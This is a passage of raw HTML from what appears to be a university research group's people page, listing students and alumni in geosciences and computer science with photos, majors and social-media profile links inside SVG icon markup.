128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c140-outer\">\n            <div data-colibri-id=\"182-c140\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c140 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c141\" class=\"d-block style-854 style-local-182-c141 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-md-shah-sayem-e1697207514119.jpg\" class=\"wp-image-1761 style-854-image style-local-182-c141-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c141-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c142\" class=\"h-global-transition-all h-heading style-850 style-local-182-c142 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c142\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Shah Md Shahnewaz Sayem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c143\" class=\"h-text h-text-component style-851 style-local-182-c143 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c144\" class=\"h-text h-text-component style-902 style-local-182-c144 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c145\" class=\"style-855 style-local-182-c145 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/shah-md-shahnewaz-sayem-767540154/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c149\" id=\"undergrads-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-828 style-local-182-c149 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c161\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-842 style-local-182-c161 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-843-outer style-local-182-c162-outer\">\n            <div data-colibri-id=\"182-c162\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-843 style-local-182-c162 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c163\" class=\"h-global-transition-all h-heading style-844 style-local-182-c163 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-844 style-local-182-c163\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Undergraduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c150\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-829 style-local-182-c150 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c151-outer\">\n            <div data-colibri-id=\"182-c151\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c151 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c152\" class=\"d-block style-831 style-local-182-c152 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207627160.jpg\" class=\"wp-image-1763 style-831-image style-local-182-c152-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c152-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c153\" class=\"h-global-transition-all h-heading style-832 style-local-182-c153 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c153\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Joshua Quiroz</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c154\" class=\"h-text h-text-component style-833 style-local-182-c154 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c155\" class=\"style-835 style-local-182-c155 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/joshua-quiroz-315713215/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c156-outer\">\n            <div data-colibri-id=\"182-c156\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c156 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c157\" class=\"d-block style-831 style-local-182-c157 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-IMG_9249-e1697207848252.jpg\" class=\"wp-image-1765 style-831-image style-local-182-c157-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c157-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c158\" class=\"h-global-transition-all h-heading style-832 style-local-182-c158 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c158\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">MD Raiyan Haque</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c159\" class=\"h-text h-text-component style-833 style-local-182-c159 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c160\" class=\"style-835 style-local-182-c160 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"	 4:40 PM       https://www.linkedin.com/in/mdraiyanhaque/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c164\" id=\"alumni\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-910 style-local-182-c164 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c220\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-924 style-local-182-c220 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-925-outer style-local-182-c221-outer\">\n            <div data-colibri-id=\"182-c221\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-925 style-local-182-c221 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c222\" class=\"h-global-transition-all h-heading style-926 style-local-182-c222 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-926 style-local-182-c222\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Alumni</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c165\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-911 style-local-182-c165 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c166-outer\">\n            <div data-colibri-id=\"182-c166\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c166 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c167\" class=\"d-block style-913 style-local-182-c167 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Sarah_Akinola-scaled-2-e1697208116294.jpg\" class=\"wp-image-1772 style-913-image style-local-182-c167-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c167-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c168\" class=\"h-global-transition-all h-heading style-914 style-local-182-c168 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c168\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sarah Akinola</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c169\" class=\"h-text h-text-component style-915 style-local-182-c169 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c170\" class=\"style-917 style-local-182-c170 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/akinola-sarah-035789138\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c171-outer\">\n            <div data-colibri-id=\"182-c171\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c171 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c172\" class=\"d-block style-918 style-local-182-c172 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Anvith-e1697208489419.jpg\" class=\"wp-image-1780 style-918-image style-local-182-c172-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-918-frameImage style-local-182-c172-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c173\" class=\"h-global-transition-all h-heading style-914 style-local-182-c173 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c173\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anvith Anand</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c174\" class=\"h-text h-text-component style-915 style-local-182-c174 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c175\" class=\"style-919 style-local-182-c175 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anvith-anand\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c176-outer\">\n            <div data-colibri-id=\"182-c176\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c176 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c177\" class=\"d-block style-920 style-local-182-c177 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Alex-e1697208598736.jpg\" class=\"wp-image-1782 style-920-image style-local-182-c177-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-920-frameImage style-local-182-c177-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c178\" class=\"h-global-transition-all h-heading style-914 style-local-182-c178 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c178\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Asige</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c179\" class=\"h-text h-text-component style-915 style-local-182-c179 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c180\" class=\"style-921 style-local-182-c180 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://twitter.com/i/flow/login?redirect_after_login=%2FAsigeAlex\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1347.656 445.313c0 11.719 0 26.367 0 38.086 0 407.227-310.547 875.977-875.977 875.977-172.852 0-336.914-49.805-471.68-137.695 23.438 2.93 49.805 2.93 73.242 2.93 143.555 0 278.32-46.875 383.789-131.836-134.766 0-249.023-90.82-290.039-213.867 20.508 5.859 38.086 5.859 58.594 5.859 29.297 0 55.664-2.93 82.031-8.789-140.625-29.297-246.094-155.273-246.094-301.758 0-2.93 0-2.93 0-5.859 41.016 23.438 87.891 38.086 137.695 38.086-82.031-52.734-137.695-149.414-137.695-254.883 0-55.664 17.578-108.398 43.945-155.273 149.414 187.5 377.93 310.547 632.813 322.266-5.859-23.438-8.789-46.875-8.789-70.313 0-169.922 137.695-307.617 307.617-307.617 90.82 0 169.922 38.086 225.586 96.68 70.313-14.648 137.695-38.086 196.289-73.242-23.438 70.313-73.242 131.836-134.766 169.922 61.523-8.789 120.117-23.438 175.781-49.805-41.016 61.523-93.75 117.188-152.344 